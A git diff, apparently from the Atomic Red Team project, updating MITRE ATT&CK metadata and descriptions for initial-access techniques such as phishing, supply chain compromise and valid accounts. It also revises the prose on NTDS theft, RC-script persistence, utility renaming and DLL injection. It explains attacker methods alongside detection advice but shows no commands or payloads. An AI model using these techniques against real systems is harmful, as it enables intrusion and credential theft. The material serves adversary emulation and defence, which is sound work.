identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Local Accounts + id: attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2 description: "Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for @@ -63542,7 +66905,14 @@ initial-access: and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement. " - id: attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2 + name: Local Accounts + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1078.003 + url: https://attack.mitre.org/techniques/T1078/003 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack @@ -63553,23 +66923,25 @@ initial-access: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-03-23T21:48:41.083Z' + modified: '2021-04-05T12:51:00.663Z' created: '2020-03-13T20:26:46.695Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: Perform regular audits of local system accounts to detect - accounts that may have been created by an adversary for persistence. Look - for suspicious account behavior, such as accounts logged in at odd times or - outside of business hours. - x_mitre_data_sources: - - Authentication logs x_mitre_platforms: - Linux - macOS - Windows + - Containers + x_mitre_data_sources: + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + x_mitre_detection: Perform regular audits of local system accounts to detect + accounts that may have been created by an adversary for persistence. Look + for suspicious account behavior, such as accounts logged in at odd times or + outside of business hours. + x_mitre_permissions_required: + - Administrator + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' identifier: T1078.003 atomic_tests: - name: Create local account with admin priviliges @@ -63594,7 +66966,7 @@ initial-access: description: |- Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns. - Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems or to gather credentials for use of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Phishing may also be conducted via third-party services, like social media platforms. + Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source. name: Phishing created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: @@ -63606,38 +66978,45 @@ initial-access: - external_id: CAPEC-98 source_name: capec url: https://capec.mitre.org/data/definitions/98.html + - source_name: Microsoft Anti Spoofing + url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide + description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP. + Retrieved October 19, 2020. + - source_name: ACSC Email Spoofing + url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf + description: Australian Cyber Security Centre. (2012, December). Mitigating + Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-10-18T01:55:03.337Z' + modified: '2021-04-14T14:38:43.211Z' created: '2020-03-02T18:45:07.892Z' + x_mitre_contributors: + - Philip Winther x_mitre_platforms: - Linux - macOS - Windows - SaaS - Office 365 + - Google Workspace x_mitre_detection: |- Network intrusion detection systems and email gateways can be used to detect phishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems. + Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) + URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link. Because most common third-party services used for phishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware. Anti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Many possible detections of follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs. x_mitre_is_subtechnique: false - x_mitre_version: '2.0' + x_mitre_version: '2.1' x_mitre_data_sources: - - File monitoring - - Packet capture - - Web proxy - - Email gateway - - Mail server - - Network intrusion detection system - - Detonation chamber - - SSL/TLS inspection - - Anti-virus + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' atomic_tests: [] T1091: technique: @@ -63670,8 +67049,10 @@ initial-access: x_mitre_is_subtechnique: false x_mitre_version: '1.0' x_mitre_data_sources: - - File monitoring - - Data loss prevention + - 'Process: Process Creation' + - 'File: File Access' + - 'File: File Creation' + - 'Drive: Drive Creation' x_mitre_detection: Monitor file access on removable media. Detect processes that execute from removable media after it is mounted or when initiated by a user. If a remote access tool is used in this manner to move laterally, @@ -63695,34 +67076,65 @@ initial-access: - external_id: CAPEC-163 source_name: capec url: https://capec.mitre.org/data/definitions/163.html + - source_name: Microsoft Anti Spoofing + url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide + description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP. + Retrieved October 19, 2020. + - source_name: ACSC Email Spoofing + url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf + description: Australian Cyber Security Centre. (2012, December). Mitigating + Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. + - source_name: Elastic - Koadiac Detection with EQL + url: https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql + description: 'Stepanic, D.. (2020, January 13). Embracing offensive tooling: + Building detections against Koadic using EQL. Retrieved November 30, 2020.' object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Spearphishing Attachment - description: |- - Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution. - - There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one. + description: "Adversaries may send spearphishing emails with a malicious attachment + in an attempt to gain access to victim systems. Spearphishing attachment is + a specific variant of spearphishing. Spearphishing attachment is different + from other forms of spearphishing in that it employs the use of malware attached + to an email. All forms of spearphishing are electronically delivered social + engineering targeted at a specific individual, company, or industry. In this + scenario, adversaries attach a file to the spearphishing email and usually + rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain + execution. Spearphishing may also involve social engineering techniques, such + as posing as a trusted source.\n\nThere are many options for the attachment + such as Microsoft Office documents, executables, PDFs, or archived files. + Upon opening the attachment (and potentially clicking past protections), the + adversary's payload exploits a vulnerability or directly executes on the user's + system. The text of the spearphishing email usually tries to give a plausible + reason why the file should be opened, and may explain how to bypass system + protections in order to do so. The email may also contain instructions on + how to decrypt an attachment, such as a zip file password, in order to evade + email boundary defenses. Adversaries frequently manipulate file extensions + and icons in order to make attached executables appear to be document files, + or files exploiting one application appear to be a file for a different one. " id: attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-10-18T01:52:25.316Z' + modified: '2021-04-01T16:21:17.553Z' created: '2020-03-02T19:05:18.137Z' - x_mitre_version: '2.0' + x_mitre_contributors: + - Philip Winther + x_mitre_version: '2.1' x_mitre_is_subtechnique: true x_mitre_detection: |- Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems. + Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) + Anti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts. + + Monitor for suspicious descendant process spawning from Microsoft Office and other productivity software.(Citation: Elastic - Koadiac Detection with EQL) x_mitre_data_sources: - - File monitoring - - Packet capture - - Network intrusion detection system - - Detonation chamber - - Email gateway - - Mail server + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' x_mitre_platforms: - macOS - Windows @@ -63797,26 +67209,10 @@ initial-access: T1566.002: technique: id: attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7 - description: "Adversaries may send spearphishing emails with a malicious link - in an attempt to gain access to victim systems. Spearphishing with a link - is a specific variant of spearphishing. It is different from other forms of - spearphishing in that it employs the use of links to download malware contained - in email, instead of attaching malicious files to the email itself, to avoid - defenses that may inspect email attachments. \n\nAll forms of spearphishing - are electronically delivered social engineering targeted at a specific individual, - company, or industry. In this case, the malicious emails contain links. Generally, - the links will be accompanied by social engineering text and require the user - to actively click or copy and paste a URL into a browser, leveraging [User - Execution](https://attack.mitre.org/techniques/T1204). The visited website - may compromise the web browser using an exploit, or the user will be prompted - to download applications, documents, zip files, or even executables depending - on the pretext for the email in the first place. Adversaries may also include - links that are intended to interact directly with an email reader, including - embedded images intended to exploit the end system directly or verify the - receipt of an email (i.e. web bugs/web beacons). Links may also direct users - to malicious applications designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, - like OAuth tokens, in order to gain access to protected applications and information.(Citation: - Trend Micro Pawn Storm OAuth 2017)" + description: |- + Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. + + All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017) name: Spearphishing Link created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: @@ -63832,11 +67228,19 @@ initial-access: url: https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks description: Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019. + - source_name: Microsoft Anti Spoofing + url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide + description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP. + Retrieved October 19, 2020. + - source_name: ACSC Email Spoofing + url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf + description: Australian Cyber Security Centre. (2012, December). Mitigating + Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-10-18T01:53:39.818Z' + modified: '2021-04-14T14:38:42.715Z' created: '2020-03-02T19:15:44.182Z' x_mitre_platforms: - Linux @@ -63844,21 +67248,21 @@ initial-access: - Windows - Office 365 - SaaS + - Google Workspace x_mitre_detection: |- URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link. + Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) + Because this technique usually involves user interaction on the endpoint, many of the possible detections take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs. x_mitre_is_subtechnique: true - x_mitre_version: '2.0' + x_mitre_version: '2.1' x_mitre_data_sources: - - Packet capture - - Web proxy - - Email gateway - - Detonation chamber - - SSL/TLS inspection - - DNS records - - Mail server + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' x_mitre_contributors: + - Philip Winther - Shailesh Tiwary (Indian Army) - Mark Wee - Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services) @@ -63906,9 +67310,9 @@ initial-access: modified: '2020-10-18T01:55:02.988Z' created: '2020-03-02T19:24:00.951Z' x_mitre_data_sources: - - SSL/TLS inspection - - Anti-virus - - Web proxy + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' x_mitre_version: '2.0' x_mitre_is_subtechnique: true x_mitre_detection: "Because most common third-party services used for spearphishing @@ -63928,30 +67332,14 @@ initial-access: atomic_tests: [] T1195: technique: - id: attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Supply Chain Compromise - description: "Adversaries may manipulate products or product delivery mechanisms - prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply - chain compromise can take place at any stage of the supply chain including:\n\n* - Manipulation of development tools\n* Manipulation of a development environment\n* - Manipulation of source code repositories (public or private)\n* Manipulation - of source code in open-source dependencies\n* Manipulation of software update/distribution - mechanisms\n* Compromised/infected system images (multiple cases of removable - media infected at the factory) (Citation: IBM Storwize) (Citation: Schneider - Electric USB Malware) \n* Replacement of legitimate software with modified - versions\n* Sales of modified/counterfeit products to legitimate distributors\n* - Shipment interdiction\n\nWhile supply chain compromise can impact any component - of hardware or software, attackers looking to gain execution have often focused - on malicious additions to legitimate software in software distribution or - update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil - 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired - victim set (Citation: Symantec Elderwood Sept 2012) or malicious software - may be distributed to a broad set of consumers but only move on to additional - tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command - Five SK 2011) Popular open source projects that are used as dependencies in - many applications may also be targeted as a means to add malicious code to - users of the dependency. (Citation: Trendmicro NPM Compromise)" + created: '2018-04-18T17:59:24.739Z' + modified: '2021-01-06T19:32:28.382Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: initial-access + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1195 @@ -63988,7 +67376,7 @@ initial-access: description: Command Five Pty Ltd. (2011, September). SK Hack by an Advanced Persistent Threat. Retrieved April 6, 2018. source_name: Command Five SK 2011 - - url: http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf + - url: https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf description: O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. source_name: Symantec Elderwood Sept 2012 @@ -63996,61 +67384,76 @@ initial-access: url: https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package to Steal from Bitcoin Wallets. Retrieved April 10, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: initial-access - modified: '2020-10-13T12:38:32.426Z' - created: '2018-04-18T17:59:24.739Z' - x_mitre_is_subtechnique: false - x_mitre_contributors: - - Veeral Patel - x_mitre_platforms: - - Linux - - Windows - - macOS + description: "Adversaries may manipulate products or product delivery mechanisms + prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply + chain compromise can take place at any stage of the supply chain including:\n\n* + Manipulation of development tools\n* Manipulation of a development environment\n* + Manipulation of source code repositories (public or private)\n* Manipulation + of source code in open-source dependencies\n* Manipulation of software update/distribution + mechanisms\n* Compromised/infected system images (multiple cases of removable + media infected at the factory) (Citation: IBM Storwize) (Citation: Schneider + Electric USB Malware) \n* Replacement of legitimate software with modified + versions\n* Sales of modified/counterfeit products to legitimate distributors\n* + Shipment interdiction\n\nWhile supply chain compromise can impact any component + of hardware or software, attackers looking to gain execution have often focused + on malicious additions to legitimate software in software distribution or + update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil + 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired + victim set (Citation: Symantec Elderwood Sept 2012) or malicious software + may be distributed to a broad set of consumers but only move on to additional + tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command + Five SK 2011) Popular open source projects that are used as dependencies in + many applications may also be targeted as a means to add malicious code to + users of the dependency. (Citation: Trendmicro NPM Compromise)" + name: Supply Chain Compromise + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7 + x_mitre_version: '1.2' x_mitre_detection: Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. Perform physical inspection of hardware to look for potential tampering. - x_mitre_data_sources: - - Web proxy - - File monitoring - x_mitre_version: '1.2' - atomic_tests: [] - T1199: - technique: - id: attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Trusted Relationship - description: |- - Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network. - - Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used. - external_references: - - source_name: mitre-attack - url: https://attack.mitre.org/techniques/T1199 - external_id: T1199 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: initial-access - modified: '2020-07-14T19:38:14.299Z' - created: '2018-04-18T17:59:24.739Z' - x_mitre_is_subtechnique: false x_mitre_platforms: - Linux - Windows - macOS - - AWS - - GCP - - Azure - - SaaS + x_mitre_contributors: + - Veeral Patel + x_mitre_is_subtechnique: false + atomic_tests: [] + T1199: + technique: + created: '2018-04-18T17:59:24.739Z' + modified: '2021-03-08T10:33:01.045Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: initial-access + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1199 + url: https://attack.mitre.org/techniques/T1199 + - source_name: CISA IT Service Providers + url: https://us-cert.cisa.gov/APTs-Targeting-IT-Service-Provider-Customers + description: CISA. (n.d.). APTs Targeting IT Service Provider Customers. Retrieved + November 16, 2020. + description: |- + Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network. + + Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers) + name: Trusted Relationship + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925 + x_mitre_contributors: + - Praetorian + x_mitre_version: '2.2' + x_mitre_data_sources: + - 'Application Log: Application Log Content' + - 'Logon Session: Logon Session Metadata' + - 'Logon Session: Logon Session Creation' x_mitre_detection: Establish monitoring for activity conducted by second and third party providers and other trusted entities that may be leveraged as a means to gain access to the network. Depending on the type of relationship, @@ -64059,16 +67462,13 @@ initial-access: is based on IT services. Adversaries may be able to act quickly towards an objective, so proper monitoring for behavior related to Credential Access, Lateral Movement, and Collection will be important to detect the intrusion. - x_mitre_data_sources: - - Azure activity logs - - Stackdriver logs - - AWS CloudTrail logs - - Application logs - - Authentication logs - - Third-party application logs - x_mitre_version: '2.0' - x_mitre_contributors: - - Praetorian + x_mitre_platforms: + - Windows + - SaaS + - IaaS + - Linux + - macOS + x_mitre_is_subtechnique: false atomic_tests: [] T1078: technique: @@ -64106,14 +67506,12 @@ initial-access: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-10-19T16:01:22.724Z' + modified: '2021-04-12T18:27:52.298Z' created: '2017-05-31T21:31:00.645Z' - x_mitre_version: '2.1' + x_mitre_version: '2.2' x_mitre_data_sources: - - AWS CloudTrail logs - - Stackdriver logs - - Authentication logs - - Process monitoring + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' x_mitre_defense_bypassed: - Firewall - Host intrusion prevention systems @@ -64132,16 +67530,17 @@ initial-access: - User - Administrator x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure - - SaaS - - Office 365 - - Azure AD + - Google Workspace + - Containers x_mitre_contributors: + - Yossi Weizman, Azure Defender Research Team - Netskope - Mark Wee - Praetorian diff --git a/atomics/T1003.003/T1003.003.md b/atomics/T1003.003/T1003.003.md index 0ba59f38..60657899 100644 --- a/atomics/T1003.003/T1003.003.md +++ b/atomics/T1003.003/T1003.003.md @@ -2,7 +2,7 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/003)
Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller.(Citation: Wikipedia Active Directory) -In addition to looking NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.(Citation: Metcalf 2015) +In addition to looking for NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.(Citation: Metcalf 2015) The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes. diff --git a/atomics/T1036.003/T1036.003.md b/atomics/T1036.003/T1036.003.md index 2c0433f8..53f7811f 100644 --- a/atomics/T1036.003/T1036.003.md +++ b/atomics/T1036.003/T1036.003.md @@ -1,6 +1,6 @@ # T1036.003 - Rename System Utilities ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/003) -
Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename rundll32.exe). (Citation: Endgame Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)
+
Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename rundll32.exe). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)
## Atomic Tests diff --git a/atomics/T1037.004/T1037.004.md b/atomics/T1037.004/T1037.004.md index 47a0a4c9..994659fb 100644 --- a/atomics/T1037.004/T1037.004.md +++ b/atomics/T1037.004/T1037.004.md @@ -1,8 +1,12 @@ -# T1037.004 - Rc.common +# T1037.004 - RC Scripts ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1037/004) -
Adversaries may use rc.common automatically executed at boot initialization to establish persistence. During the boot process, macOS executes source /etc/rc.common, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings and is thus recommended to include in the start of Startup Item Scripts (Citation: Startup Items). In macOS and OS X, this is now a deprecated mechanism in favor of [Launch Agent](https://attack.mitre.org/techniques/T1543/001) and [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) but is currently still used. +
Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify. -Adversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user. (Citation: Methods of Mac Malware Persistence)
+Adversaries can establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence. + +Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware) + +Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)
## Atomic Tests diff --git a/atomics/T1055.001/T1055.001.md b/atomics/T1055.001/T1055.001.md index 09391906..d0e78dc8 100644 --- a/atomics/T1055.001/T1055.001.md +++ b/atomics/T1055.001/T1055.001.md @@ -2,9 +2,9 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1055/001)
Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process. -DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). (Citation: Endgame Process Injection July 2017) +DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017) -Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary).(Citation: Endgame HuntingNMemory June 2017)(Citation: Endgame Process Injection July 2017) +Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017) Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process.
diff --git a/atomics/T1055.012/T1055.012.md b/atomics/T1055.012/T1055.012.md index b2601829..b8770a1b 100644 --- a/atomics/T1055.012/T1055.012.md +++ b/atomics/T1055.012/T1055.012.md @@ -2,7 +2,7 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1055/012)
